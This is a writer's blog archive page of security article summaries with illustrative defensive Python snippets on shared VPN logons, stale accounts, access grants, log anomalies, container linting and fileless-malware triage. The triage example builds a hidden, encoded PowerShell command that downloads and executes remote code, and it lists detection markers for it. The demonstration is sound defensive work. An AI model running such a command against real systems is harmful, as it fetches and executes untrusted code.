No computing professional wants to encounter a ransomware attack, but these six poor IT decisions can make that scenario more likely to occur. Ransomware attacks are not the result of an isolated security incident but the consequence of a series of IT missteps. Moreover, an attack often exposes poor decision-making that points to deeper management issues that must be fixed. In this article for HPE’s Enterprise.nxt website, I discuss how these missteps can be corrected before you become the subject of the next attack.


Category Archives: Published work

CSOonline: What is Magecart?

Magecart is a consortium of malicious hacker groups that target online shopping cart systems, usually the Magento system, to steal customer payment card information. This is known as a supply chain attack: the idea is to compromise a third-party piece of software from a VAR or systems integrator, or to infect an industrial process unbeknownst to IT. I explain what this malware does, link to some of the more notable hacks of recent history, and offer a few suggestions on how you can better protect your networks against it.


You can read my post for CSOonline here.

RSA blog: Risk analysis vs. assessment: understanding the key to digital transformation

When it comes to looking at risks, many corporate IT departments tend to get their language confused. This is especially true of the difference between risk analysis, which is the raw material used to collect data about your risks, and risk assessment, which contains the conclusions and the resource allocation needed to do something about these risks. Let’s talk about why this confusion exists, the challenges it causes, and how we can avoid it as we move along our various paths of digital transformation.

Part of this confusion has more to do with the words we choose than with any actual activity. When an IT person says some practice is risky, what our users often hear is “No, you can’t do that.” That gets to the heart of the historical IT/user conflict. We must do a better job of moving away from being the “party of no” toward understanding what our users want to do and enabling their success. This means that if they suggest doing something inherently risky, we have to work with them and guide them to the more secure promised land.

IT also has to change its own vocabulary from techno-babble to the language of business, meaning money and the financial impact of its actions, if it wants the rest of the company to really grok what it is talking about. Certainly, I am not the first (nor will I be the last) person to say this. This is a common complaint from David Froud when he talks to the C-suite: “If I can’t show how a risk to the assets at my level can affect an entire business at theirs, how can I possibly expect them to understand what I’m talking about?”

Certainly, it isn’t just proper word choice. Many times users don’t see the risky consequences of their actions, nor should they: that really isn’t part of their job description. Here is a recent example. Look at this Tweet stream from SwiftOnSecurity about what is going on in one corporation. Its users pick evergreen, shared user IDs for their VPN sign-ons. Rather than have unique IDs that match a specific, actual person, they reuse the same account name (and, of course, password) and pass it along to the various users who need access. Needlessly risky, right? The users don’t see it in quite this light. They do this because IT failed to deliver a timely solution that is convenient and simple. I imagine the thinking behind this decision went something like this:

IT person: “You have to use our VPN if you are going to connect to our network from a remote location. You need to fill out this form and get it approved by 13 people before we can assign you a new logon.”

User: “Ok, but that is too much work. I will just use Joe’s logon and password.”

Granted, IT security is often the enemy of convenience, and that is a constant battle. It is why we have these reused passwords, and why our adversaries can always rely on this flaw to infiltrate our networks. The onus is on us, as technologists, to make our protection methods as convenient as possible while reducing risk at the same time.
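A shared logon like “Joe’s” tends to leave a recognizable trace: the same account connected from two places at once. The sketch below is a hypothetical illustration, assuming you can export VPN session records with a user name, source IP address, and start and end times; the `VpnSession` type and `find_shared_accounts` function are invented for this example and are not part of any VPN product.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class VpnSession:
    user: str          # account name used to log on
    source_ip: str     # address the session came from
    start: datetime
    end: datetime


def find_shared_accounts(sessions: list[VpnSession]) -> set[str]:
    """Return accounts that have overlapping sessions from different source IPs."""
    by_user: dict[str, list[VpnSession]] = {}
    for s in sessions:
        by_user.setdefault(s.user, []).append(s)

    shared = set()
    for user, user_sessions in by_user.items():
        user_sessions.sort(key=lambda s: s.start)
        for i, a in enumerate(user_sessions):
            for b in user_sessions[i + 1:]:
                if b.start >= a.end:
                    break  # sorted by start time, so no later session overlaps a
                if b.source_ip != a.source_ip:
                    shared.add(user)
    return shared


# Example data using documentation-only IP ranges.
t = datetime(2019, 6, 3)
sessions = [
    VpnSession("joe", "198.51.100.7", t.replace(hour=9), t.replace(hour=12)),
    VpnSession("joe", "203.0.113.20", t.replace(hour=10), t.replace(hour=11)),
    VpnSession("ann", "198.51.100.9", t.replace(hour=9), t.replace(hour=10)),
]
print(find_shared_accounts(sessions))  # {'joe'}
```

A finding like this is a conversation starter with the users involved, not proof of wrongdoing; it points to where IT’s access process is too slow.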

There are some bright signs of how far we have all come. In Dell’s second survey of digital transformation attitudes, a third of the respondents said that concerns about data privacy and security were their biggest obstacle to digital progress. This was the top concern in this year’s survey; two years ago, it was much further down the list. Fortunately, security technology investments also topped the list of planned improvements in the survey. Two years ago, these investments didn’t even make the top ten, which shows how much awareness and priority infosec has gained. Nevertheless, half of the respondents feel they will continue to struggle to prove that they are a trustworthy organization.

So where do we go from here? Here are a few suggestions.

First, as I mentioned in my earlier blog post, Understanding the Trust Landscape, RSA CTO Dr. Zulfikar Ramzan advocates replacing the zero trust model with one focused on managing zero risk. That is an important distinction, and it moves us toward a common vocabulary that any business executive can understand.

Second, we must do a better job with sharing best practices between our IT security and risk management teams. Many companies deliberately keep these two groups separate, which can backfire if they start competing for budget and personnel.

Finally, listen carefully to what you are saying from your users’ perspective. “Technologists show up with a basket of cute little kittens to business leaders with a cat allergy,” said Salesforce VP Peter Coffee. Think carefully about how you assess risk and how you can sell managing its reduction in the language of money.
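One common textbook way to put a risk into the language of money is annualized loss expectancy: ALE = SLE × ARO, where the single loss expectancy (SLE) is the asset value times the exposure factor (the fraction of that value one incident destroys), and ARO is the expected number of incidents per year. The minimal sketch below shows only the arithmetic; every figure in it is made up, and this is one standard model rather than a method prescribed by anyone quoted here.

```python
def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = asset value x fraction of that value lost in one incident."""
    return asset_value * exposure_factor


def annualized_loss_expectancy(sle: float, annual_rate: float) -> float:
    """ALE = SLE x expected number of incidents per year (ARO)."""
    return sle * annual_rate


# Hypothetical figures for a customer database, for illustration only.
sle = single_loss_expectancy(asset_value=2_000_000, exposure_factor=0.25)  # 500,000
ale_before = annualized_loss_expectancy(sle, annual_rate=0.4)  # 200,000 per year
ale_after = annualized_loss_expectancy(sle, annual_rate=0.1)   # 50,000 with a new control
control_cost = 60_000  # hypothetical yearly cost of that control

net_benefit = ale_before - ale_after - control_cost
print(f"Expected loss avoided per year: ${ale_before - ale_after:,.0f}")
print(f"Net benefit after control cost: ${net_benefit:,.0f}")
```

A result framed as “this control saves us about $90,000 a year” is the kind of statement a business leader can weigh against other spending, which is the point of the exercise.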

Taking control over your own health care: the rise of the Loopers

I have been involved in tech for most of my professional career, but only recently did I realize its role in literally saving my life. Maybe that is too dramatic. Let’s just say that nothing dire has happened to me; I am healthy and doing fine. This realization has come from taking a longer view of my recent past and the role that tech has played in keeping me healthy.

Let me tell you how this came about. Not too long ago, I read this article in The Atlantic about people with type 1 diabetes (T1D) who have taken to hacking the firmware and software running their insulin pumps. For those of you who don’t know the background, T1D folks typically have been dealing with their illness from an early age, which is why they are often called “juvenile diabetics.” The disease occurs when the pancreas does not produce the insulin needed to metabolize food.


People with T1D typically take insulin in one of two broad ways: by injection or by using a pump that they wear 24/7. They monitor their glucose levels either with manual chemical tests or by having the pump run the tests periodically.

Every T1D relies on a great deal of technology to manage their disease and their treatment. They have to be extremely careful with what they eat, when they eat, and how they exercise. A cup of coffee can ruin their day, and something else can literally put them in mortal danger.

That is what got me thinking about my own situation. As I said, my case is far less dire, but I had never really looked at my overall health care. To take three instances: I take daily blood pressure meds, use a sleep apnea machine every night, and wear a hearing aid. All of these manage various issues with my health, all of them are tech-related, and I am thankful that modern medicine has figured them out to mitigate my problems. I would not be as healthy as I am today without them. Sometimes I get sad about the various regimens, particularly when I have to lug the apnea machine aboard yet another international flight or remember to reorder my meds. Yet I know that my reliance on tech is far less than that of T1D folks.

I know a fair bit about T1D through an interesting story. It is actually how I met my wife Shirley many years ago: we were both volunteers at a JDRF bike fundraising event in Death Valley, even though neither of us has a direct family connection to the disease. I was supposed to ride the event and had raised a bunch of money (thanks to many of your kind donations, BTW) but broke my shoulder during a training ride. Fortunately, the JDRF folks running the event insisted that I should still come, and the rest, as they say, is history.

One of the T1D folks that I know is a former student of mine, who is part of the community of “loopers” that are hacking their insulin pumps. Over the past several months he has collected the necessary gear to get this to work. Let’s call him Adam (not his real name).

Why is looping better than just using the normal pump controls? Mainly because it provides better feedback and more precise control over insulin doses. As Adam explains: “If you literally sat and watched your blood sugar 24/7 and were constantly making adjustments, sure you could get great control over your insulin levels. But it’s far easier to let the software do it for you, because it checks your levels every five minutes. In reality, I’m feeding my pump’s computer small pieces of data that is very commonly used in the T1D community for diabetes management. So it is no big deal.”


Adam also told me it took him about four days to get used to the setup and understand what the computer’s algorithms were doing for his insulin management. A great deal of information is available in online forums and in the documentation for the various software projects involved, many of them open source, such as Xdrip, Spike, OpenAPS, Nightscout, Loop, Tidepool, and Diasend. It is pretty remarkable what these folks are doing. As Adam says, “You need to be involved in your own care, but some of the stress in decision making is gone. Having a future prediction of your glucose level makes it easier to plan for the longer term and feel more confident.”

But looping has another big benefit: it monitors you even when you are asleep. It also gives you a new perspective on your care, because you have to understand what the computer algorithms are doing in dispensing insulin. “The most powerful way to use an algorithm is when you combine the human and computer together. The algorithm is not learning. It’s just reusing well established rules,” says Adam. “It’s pretty dumb without me and I’m way better off with it when we work together. That’s why I say that my setup is a thousand times better than what I had before. I have an astonishingly better tool in this fight.”
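To give a feel for the “future prediction” and “well established rules” Adam describes, here is a deliberately toy sketch. It is not how Loop or OpenAPS actually work (their models also account for insulin already on board and carbohydrates eaten), and it doses nothing: it simply extrapolates the last few five-minute readings in a straight line and applies a fixed rule. The function names and thresholds are illustrative assumptions, not medical guidance.

```python
from statistics import mean

READING_INTERVAL_MIN = 5  # CGM readings assumed to arrive every five minutes


def predict_glucose(readings_mg_dl: list[float], minutes_ahead: int) -> float:
    """Toy forecast: extend the average recent change in a straight line.

    Needs at least one reading; with only one, the forecast is flat.
    """
    if len(readings_mg_dl) < 2:
        return readings_mg_dl[-1]
    deltas = [b - a for a, b in zip(readings_mg_dl, readings_mg_dl[1:])]
    rate_per_min = mean(deltas) / READING_INTERVAL_MIN
    return readings_mg_dl[-1] + rate_per_min * minutes_ahead


def classify(predicted: float, low: float = 70, high: float = 180) -> str:
    """Fixed rule: compare the forecast with an illustrative target range."""
    if predicted < low:
        return "predicted low"
    if predicted > high:
        return "predicted high"
    return "in range"


recent = [150, 155, 160, 165]  # last four readings, five minutes apart
forecast = predict_glucose(recent, minutes_ahead=30)
print(round(forecast), classify(forecast))  # 195 predicted high
```

Even this toy shows why the human stays in the loop: the rule knows nothing about the meal you are about to eat or the run you just finished.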

There are a few downsides. You need to learn how to become your own system integrator, because there are different pieces you have to knit together. Pump firmware can also disable looping: this was done to protect patients, after it was found that some pumps were hackable (at close distances, but still). If you upgrade your pump, your looping could be disabled.

You also need to have a paid Apple Developer account to put everything together, because the iPhone app that is used to connect his pump requires this developer-level access. “It is more than worth the $100 a year,” Adam told me. There are also Android solutions, but he has been an iPhone user for so long it didn’t make sense for him to switch.

Finally, looping is not yet approved by the FDA. Many other countries have recognized this pattern of treatment, and the FDA is considering approval.

This is the way of the modern tech era, and it shows how savvy patients have begun to take back control over their care. It is great that we can point to this example of how tech can literally save lives, and that patients today have such powerful tools at their disposal. Hopefully the looping story will inspire you to take control over your own medical care.

HPE Enterprise.nxt: Six security megatrends from the Verizon DBIR



Verizon’s 2019 Data Breach Investigations Report (DBIR) is probably this year’s second-most anticipated report, after the one from Robert Mueller. Now in its 12th edition, it contains details on more than 2,000 confirmed data breaches in 2018, drawn from more than 70 contributing sources, and analyzes more than 40,000 separate security incidents.

What sets the DBIR apart is that it combines breach data from multiple sources using a common industry framework called VERIS (the Vocabulary for Event Recording and Incident Sharing), so that threat data contributed by third parties can be made anonymous and pooled. This gives the report a solid, authoritative voice, and it is one reason why it’s frequently quoted.
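The value of a common schema is that records from different contributors can be pooled and counted the same way. VERIS describes incidents in terms of its “four A’s”: actor, action, asset, and attribute. The sketch below is a heavily simplified, hypothetical stand-in for that idea, not the actual VERIS JSON schema; the field names and sample records are invented for illustration.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Incident:
    """Simplified record loosely modeled on VERIS's four A's (not the real schema)."""
    source: str      # contributing organization, already anonymized
    actor: str       # e.g. "external", "internal", "partner"
    action: str      # e.g. "hacking", "malware", "social", "error"
    asset: str       # e.g. "server", "user device", "person"
    attribute: str   # e.g. "confidentiality", "integrity", "availability"
    breach: bool     # confirmed data disclosure, not just an incident


def summarize(incidents: list[Incident]) -> tuple[int, int, Counter]:
    """Count incidents, confirmed breaches, and breaches by actor type."""
    breaches = [i for i in incidents if i.breach]
    return len(incidents), len(breaches), Counter(i.actor for i in breaches)


# Records from two hypothetical contributors, already in the shared format.
records = [
    Incident("contributor-a", "external", "hacking", "server", "confidentiality", True),
    Incident("contributor-a", "internal", "error", "server", "confidentiality", True),
    Incident("contributor-b", "external", "malware", "user device", "integrity", False),
    Incident("contributor-b", "external", "social", "person", "confidentiality", True),
]
total, confirmed, by_actor = summarize(records)
print(total, confirmed, dict(by_actor))  # 4 3 {'external': 2, 'internal': 1}
```

Because both contributors describe incidents with the same fields, their data can be merged without any per-source translation, which is what lets the DBIR report on tens of thousands of incidents at once.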


I describe six megatrends from the report, including:

- The C-suite has become the weakest link in enterprise security.

- The rise of nation-state actors.

- Careless cloud users continue to thwart even the best-laid security plans.

- Whether insider or outsider threats are more important.

- The rate of ransomware attacks isn’t clear.

- Hackers are still living inside our networks for a lot longer than we’d like.

I’ve broken these trends into two distinct groups: the first three are where there is general agreement between the DBIR and other sources, and the last three are where this agreement isn’t as apparent. Read the report to determine what applies to your specific situation. In the meantime, here is my analysis for HPE’s Enterprise.nxt blog.

RSA blog: Managing the security transition to the truly distributed enterprise

As your workforce spreads across the planet, you now have to support a completely new collection of networks, apps, and endpoints. We all know that this increased attack surface area is more difficult to manage. Part of the challenge is that you have to create new standards, policies, and so forth to protect your enterprise and reduce risk as you make this transformation to become a more distributed company. In this blog post, I will examine some of the things to look out for. My thesis is that you want to match the risks with the approaches, so that you focus on the optimal security improvements as you make this transition to a distributed staffing model.

There are two broad items to think about: one that has nothing to do with technology, and one that does. Let’s take the first item. Regardless of what technologies we deploy, the way we choose them is critical. Your enterprise doesn’t have to be very large before you have different stakeholders and decision-makers influencing what gets bought and when. This isn’t exclusively a technology decision per se, but it has huge security and risk implications. If you buy the wrong gear, you don’t do yourself any favors and can increase your corporate risk profile rather than reduce it. The last thing any of us needs is different departments with their own incompatible security tools. This stakeholder issue is something I spoke about in my last blog post on managing third-party risk.

Why is this important now? Certainly, we have had “shadow IT” departments making independent computer purchases almost since corporations first began buying PCs in the early 1980s. But unlike that era, when corporations worried about buying Compaqs vs. IBMs, today’s purchases have more serious implications and greater risk because of the extreme connectivity of the average business. One weak link in your infrastructure, such as a single infected Android phone, and your risk can quickly escalate.

But there is another factor in the technology choice process: getting security right is hard. It isn’t just a matter of buying something off the shelf. More likely, you will need several products, and you have to fit them together in the right way to provide the most protection and to address the various vectors of compromise and risk. This makes sense: as the attack surface area increases, we add technologies to our defensive portfolio to match it and step up our game. But here’s the catch: what we choose is just as important as how we choose it.

Assuming you can get both of these factors under control, let’s next talk about some of the actual technology-related issues. They roughly fall into three categories: authentication/access, endpoint protection and threat detection/event management.

Authentication, identity and access rights management. Most of us immediately think about this class of problems when it comes to reducing risk, and certainly there are a boatload of tools to help us do so. For example, you might want to have a tool to enable single sign-ons, so that you can reduce password fatigue and also improve on- and off-boarding of employees. No arguments there.

But before you go out and buy one or more of these products, you might want to understand how out of date your Active Directory is. By this, I mean quantify the level of effort you will need to make it accurate, so that it represents the current state of your users and network resources. The Global Risk Report from Varonis found that more than half of their customers had more than a thousand stale user accounts that hadn’t been removed from the books. That is a lot of housecleaning before any authentication mechanism is going to be useful. Clearly, many of us need to improve our offboarding processes to ensure that access rights are terminated at the appropriate moment, and not six months down the road, after an attacker has seized control of a departed user’s still-active account.
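A first pass at quantifying that housecleaning can be as simple as flagging enabled accounts that haven’t logged on in months. The sketch below assumes you have already exported accounts (for example, with PowerShell’s `Get-ADUser`) into dictionaries with `sAMAccountName`, `enabled`, and `lastLogonTimestamp` keys; that export format and the function names are hypothetical. Active Directory stores `lastLogonTimestamp` as a Windows FILETIME, and the attribute is only updated periodically (by default, roughly every one to two weeks), so choose a generous idle threshold.

```python
from datetime import datetime, timedelta, timezone

# A Windows FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def stale_accounts(accounts: list[dict], max_idle_days: int, now: datetime) -> list[str]:
    """Return enabled accounts whose last logon is older than max_idle_days.

    A lastLogonTimestamp of 0 is treated as "never logged on".
    """
    cutoff = now - timedelta(days=max_idle_days)
    stale = []
    for acct in accounts:
        if not acct["enabled"]:
            continue  # already disabled: still worth deleting, but lower risk
        raw = acct["lastLogonTimestamp"]
        if raw == 0 or filetime_to_datetime(raw) < cutoff:
            stale.append(acct["sAMAccountName"])
    return stale


# Hypothetical export with three accounts.
now = datetime(2019, 6, 1, tzinfo=timezone.utc)
export = [
    {"sAMAccountName": "asmith", "enabled": True,
     "lastLogonTimestamp": datetime_to_filetime(now - timedelta(days=3))},
    {"sAMAccountName": "former.contractor", "enabled": True,
     "lastLogonTimestamp": datetime_to_filetime(now - timedelta(days=200))},
    {"sAMAccountName": "svc-old", "enabled": True, "lastLogonTimestamp": 0},
]
print(stale_accounts(export, max_idle_days=90, now=now))  # ['former.contractor', 'svc-old']
```

The count this produces is a rough proxy for the offboarding backlog; each flagged account still needs a human decision before it is disabled.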

Beyond getting the directory accurate, organizations will also have to match identity assurance mechanisms to the right levels of risk. Otherwise, you aren’t protecting the right things with the appropriate level of security. You’ll want to answer questions such as:

- Do you know where your most critical business assets are and how to protect them properly?

- How will your third-party partners and others outside your immediate employ authenticate themselves? Will they need (or should they use) a different system from your full-time staff?

- Can you audit your overall portfolio of access rights for devices and corporate computing resources to ensure they are appropriate and offer the best current context? At many firms, everyone has admin access to every network share: clearly, that is a very risky path to take.
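The last question lends itself to automation. Here is a minimal sketch, assuming you can export access grants as (resource, principal, right) triples and have a list of which resources the business considers critical; the simplified `read`/`write`/`admin` rights model, the `Grant` type, and the `risky_grants` function are hypothetical. It flags admin rights granted to broad groups anywhere, and write access for broad groups on critical assets.

```python
from dataclasses import dataclass

# Built-in Windows groups that effectively mean "almost everybody".
BROAD_GROUPS = {"Everyone", "Authenticated Users", "Domain Users"}


@dataclass(frozen=True)
class Grant:
    resource: str   # e.g. a file share or application
    principal: str  # user or group receiving the right
    right: str      # "read", "write" or "admin" in this simplified model


def risky_grants(grants: list[Grant], critical: set[str]) -> list[str]:
    """Flag broad admin grants anywhere and broad write grants on critical assets."""
    findings = []
    for g in grants:
        if g.principal not in BROAD_GROUPS:
            continue
        if g.right == "admin":
            findings.append(f"{g.resource}: {g.principal} has admin rights")
        elif g.right == "write" and g.resource in critical:
            findings.append(f"{g.resource}: {g.principal} can write to a critical asset")
    return findings


grants = [
    Grant(r"\\fs01\finance", "Everyone", "admin"),
    Grant(r"\\fs01\hr", "Domain Users", "write"),
    Grant(r"\\fs01\public", "Domain Users", "write"),
    Grant(r"\\fs01\finance", "FinanceTeam", "write"),
]
findings = risky_grants(grants, critical={r"\\fs01\finance", r"\\fs01\hr"})
for finding in findings:
    print(finding)
```

The useful design choice here is that “critical” comes from the business, not from IT: the same broad write grant is tolerated on a public share and flagged on HR data.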

Endpoint protection. This topic understandably gets a lot of attention, especially now that threats target vulnerabilities in specific endpoints such as Windows and Android devices. Back when everyone worked next to each other in a few physical office locations, it was relatively easy to set this up and effectively screen out incoming malware. But as our corporate empire has spread around the world, it has become harder to do. Many endpoint products, for example, were not designed for the latencies typical of wide-area links, can’t produce warnings quickly enough to be effective, or can’t handle endpoints well without pre-installed agents.

That is bad enough, but there is another complicating factor: few products do equally well at protecting mobile devices, PCs, and endpoints running embedded systems, so you often need multiple products to cover your complete endpoint collection. As malware writers get smarter at hiding their activities in plain sight, we must do a better job of figuring out when they have compromised an endpoint and shutting them down. And how these multiple products play together can itself introduce more risk.

Threat detection and event management. Our third challenge for the distributed workforce is detecting and deterring abuses and attacks in a timely and efficient manner across your entire infrastructure. This is much harder now that there is no longer any hard division between corporate-owned devices and servers and non-owned devices, including personal endpoints and cloud workloads. Remember when we used to talk about “bring your own device”? That seems so last year now: most corporations just assume that remote workers will use whatever they already have. That places a heavier burden on security teams to detect and prevent threats that could originate on these devices.

The heterogeneous device portfolios of the current era also place a bigger burden, and higher risk, on watching and interpreting the various security event logs. If malware has touched any of these devices, something will appear in a log entry, which means security analysts need the right kinds of automated tools to alert them to any anomalies.
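As a small illustration of what “automated tools to alert them about anomalies” can mean, here is a minimal baseline-and-threshold sketch. It assumes you already aggregate one event type (say, failed logons) into per-host counts per time interval; the data layout, the `anomalous_hosts` function, and the default threshold are hypothetical, and real SIEM products use far richer models. Each host is compared with its own history rather than a global average, which matters when laptops, phones, and servers behave so differently.

```python
from statistics import mean, pstdev


def anomalous_hosts(baseline: dict[str, list[int]], current: dict[str, int],
                    z_threshold: float = 3.0, min_stdev: float = 1.0) -> list[str]:
    """Flag hosts whose current event count is far above their own history.

    baseline: past per-interval counts of one event type for each host
    current:  the count for the interval being checked
    """
    flagged = []
    for host, count in current.items():
        history = baseline.get(host)
        if not history:
            flagged.append(host)  # never seen before: worth a look on its own
            continue
        # Floor the spread so a perfectly flat history doesn't divide by zero.
        spread = max(pstdev(history), min_stdev)
        if (count - mean(history)) / spread > z_threshold:
            flagged.append(host)
    return flagged


baseline = {"laptop-17": [2, 3, 1, 2, 4, 3], "web-02": [10, 12, 11, 9, 13, 12]}
current = {"laptop-17": 41, "web-02": 14, "phone-unknown": 5}
print(anomalous_hosts(baseline, current))  # ['laptop-17', 'phone-unknown']
```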

As I have said before, managing risk isn’t a one-and-done decision, but a continuous journey. I hope the above items will stimulate your own thinking about the various touchpoints you’ll need to consider for your own environment as you make your journey towards improving your enterprise security.

Endgame white paper: How to replace your AV and move into EPP

The nature of anti-virus software has radically changed since the first pieces of malware invaded the PC world back in the 1980s. As the world has become more connected and more mobile, the criminals behind malware have become more sophisticated and better at targeting their victims with various ploys. This guide takes you through this historical context before setting out why it is time to replace AV with newer security controls that offer stronger protection at a lower cost, with less demand for skilled security operations staff to deploy and manage them. In this white paper I co-wrote for Endgame Inc., I show what is happening with malware development, how to protect your network from it, why you should switch to a more modern endpoint protection platform (EPP), and how to do it successfully.


Security Intelligence: How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing. Fileless malware relies on what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that hold actionable data, the .NET framework, and so on. Malware doesn’t have to drop a file to use these programs for malicious purposes.


Given this growing threat, I provide several tips on what security teams can do to help defend their organizations against these attacks in my latest post for IBM’s Security Intelligence blog.
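One living-off-the-land trick is easy to illustrate: hiding a PowerShell script behind the `-EncodedCommand` switch (or a short form such as `-enc`), which takes a Base64 string of the script’s UTF-16LE bytes. The sketch below assumes you already collect process command lines from your endpoints; it decodes such arguments and applies a few string checks. The marker list and function names are illustrative assumptions, and the check is far from exhaustive: real detection leans on richer telemetry such as PowerShell script block logging.

```python
import base64
import binascii
from typing import Optional

# Spellings powershell.exe accepts for -EncodedCommand (case-insensitive),
# including the short forms attackers favor. Not an exhaustive list.
_FULL = "encodedcommand"
ENCODED_FLAGS = {"-e", "-ec"} | {"-" + _FULL[:n] for n in range(2, len(_FULL) + 1)}

# Hypothetical indicators; tune these for your own environment.
SUSPICIOUS_MARKERS = ("downloadstring", "invoke-expression", "iex ", "frombase64string")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line uses -EncodedCommand."""
    tokens = command_line.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag.lower() in ENCODED_FLAGS:
            try:
                # The argument is Base64 of the script's UTF-16LE bytes.
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def triage(command_line: str) -> list[str]:
    """List the reasons a command line looks suspicious (empty if none)."""
    reasons = []
    script = decode_encoded_command(command_line)
    if script is not None:
        reasons.append("uses -EncodedCommand")
    text = (command_line + " " + (script or "")).lower()
    reasons += [f"contains '{m.strip()}'" for m in SUSPICIOUS_MARKERS if m in text]
    return reasons


payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
cmd = f"powershell.exe -nop -w hidden -enc {encoded}"
print(triage(cmd))
```

Decoding before matching is the key step: without it, the suspicious `DownloadString` call never appears in the command line at all.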

CSOonline: How to improve container security

Gartner has named container security one of its top ten concerns for this year, so it might be time to take a closer look at this issue and figure out a solid security implementation plan. While containers have been around for a decade, they are becoming increasingly popular because of their lightweight and reusable code, flexible features and lower development cost. In this post for CSOonline, I’ll look at the kinds of tools needed to secure the devops/build environment, tools for the containers themselves, and tools for monitoring/auditing/compliance purposes. Naturally, no single tool will do everything.
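As one small example of build-environment tooling, here is a hypothetical check for two widely cited Dockerfile problems: base images that aren’t pinned to a specific version, and a final stage that never switches to a non-root user. It is a sketch under simple assumptions (one instruction per line, no line continuations), and the `lint_dockerfile` function is invented for this example; purpose-built linters such as Hadolint go much further.

```python
def lint_dockerfile(text: str) -> list[str]:
    """Flag unpinned base images and a final stage with no non-root USER."""
    findings: list[str] = []
    stages: set[str] = set()  # names given with "FROM ... AS name"
    final_user = None         # USER set in the most recent stage, if any

    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        parts = line.split()
        instruction = parts[0].upper()

        if instruction == "FROM":
            args = [p for p in parts[1:] if not p.startswith("--")]  # drop --platform=...
            image = args[0]
            final_user = None  # a new stage starts; track its own USER
            pinned = "@" in image  # digest references are immutable
            name = image.rsplit("/", 1)[-1]  # ignore any registry host:port prefix
            tag = name.split(":", 1)[1] if ":" in name else None
            if image != "scratch" and image not in stages and not pinned:
                if tag is None or tag == "latest":
                    findings.append(f"base image '{image}' is not pinned to a version")
            if len(args) >= 3 and args[1].upper() == "AS":
                stages.add(args[2])
        elif instruction == "USER" and len(parts) > 1:
            final_user = parts[1]

    if final_user is None or final_user.split(":")[0] in ("root", "0"):
        findings.append("final stage sets no non-root USER, so it may run as root")
    return findings


dockerfile = """
FROM golang:1.12 AS build
COPY . /src
RUN cd /src && go build -o /app

FROM alpine:latest
COPY --from=build /app /app
ENTRYPOINT ["/app"]
"""
for finding in lint_dockerfile(dockerfile):
    print(finding)
```

The root check is phrased as “may run as root” on purpose: a base image can set its own non-root user, which a line-by-line scan like this cannot see.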


RSA blog: Understanding the trust landscape

Earlier this month, RSA president Rohit Ghai opened the RSA Conference in San Francisco with some stirring words about understanding the trust landscape. The talk is both encouraging and depressing: encouraging for what it offers, and depressing for how far we have yet to go to realize this vision completely.


Back in the day, we had the now-naïve notion that defending a perimeter was sufficient. If you were “inside” (however defined), you were automatically trusted. Or once you authenticated yourself, you were then trusted. It was a binary decision: in or out. Today, there is nothing completely inside and trusted anymore.

It is all a matter of shades of grey, so cyber security means evaluating who and what is trusted on a continuous basis. Ironically, to appreciate these shades of grey, we have to work a lot harder before we can trust our computers, apps and devices.
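To make “shades of grey” concrete, here is a toy sketch of an access decision that is re-evaluated on every request and can return something other than a yes or no. The signals, weights, and thresholds are invented for illustration and do not describe any RSA product or the approach Rohit outlined.

```python
from dataclasses import dataclass


@dataclass
class AccessRequest:
    user_verified_mfa: bool    # did this session pass multi-factor authentication?
    device_managed: bool       # corporate-managed and patched
    known_location: bool       # matches the user's usual locations
    resource_sensitivity: int  # 1 (low) to 3 (high), set by the asset's owner


def trust_decision(req: AccessRequest) -> str:
    """Return 'allow', 'step-up' (ask for more proof) or 'deny' from a toy risk score."""
    risk = 0
    risk += 0 if req.user_verified_mfa else 2
    risk += 0 if req.device_managed else 1
    risk += 0 if req.known_location else 1
    risk *= req.resource_sensitivity  # the same signals matter more for critical data

    if risk == 0:
        return "allow"
    if risk <= 3:
        return "step-up"
    return "deny"


# Called on every request, not once at login.
print(trust_decision(AccessRequest(True, True, True, 3)))    # allow
print(trust_decision(AccessRequest(True, False, True, 1)))   # step-up
print(trust_decision(AccessRequest(True, False, False, 3)))  # deny
```

The middle outcome is the important one: instead of a binary in-or-out, a risky-looking request earns a request for more proof.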

I had an opportunity to spend some time with Rohit at a presentation we both did in London earlier this year and enjoyed exchanging many ideas with him.

Part of the challenge is that the world has become a lot more complicated. How many of us now accept the following as part of our normal routines?

- Telling my credit card company when I will be out of the country is now part of my pre-trip routine.

- Questioning requests for our SSN or street address. Remember when some of us had them printed on our checks?

- When signing up for a new website, I no longer automatically provide my “real” birthday. While this is a more secure posture, it is also somewhat annoying when this date rolls around on the calendar and those congratulatory notes come in.

- Now I use MFA sign-ons more routinely. But when I have an account that doesn’t use MFA it gives me pause as to whether I even want to do business with them.

- I now accept the extra steps of using a VPN when roaming around on public Wi-Fi networks as part of my normal connection process.

Like Rohit, I have begun “to obsess about the trust landscape.” I think we all know what he means. He spoke about how to manage various risks, which means assessing the likelihood of particular digital compromises to our networks, our endpoints, and our lives. “It must become our new normal,” he said during his keynote.

But what does this really imply? That we can’t trust anyone or anything anymore? That is where the depression sets in. Some vendors have tried to make lemonade out of these lemons by promoting what they call a “zero trust” model. You might think this is a new term, but you would be wrong. It has been around since 2010, when then-Forrester analyst John Kindervag first created the notion. The idea is simple: no one gets any access until they can prove their identity. In that paper, he mentions how when Bugsy Siegel built Vegas, he built the town first, and then the roads. In IT, too often we first go for the infrastructure before we understand the apps that will be running on it.

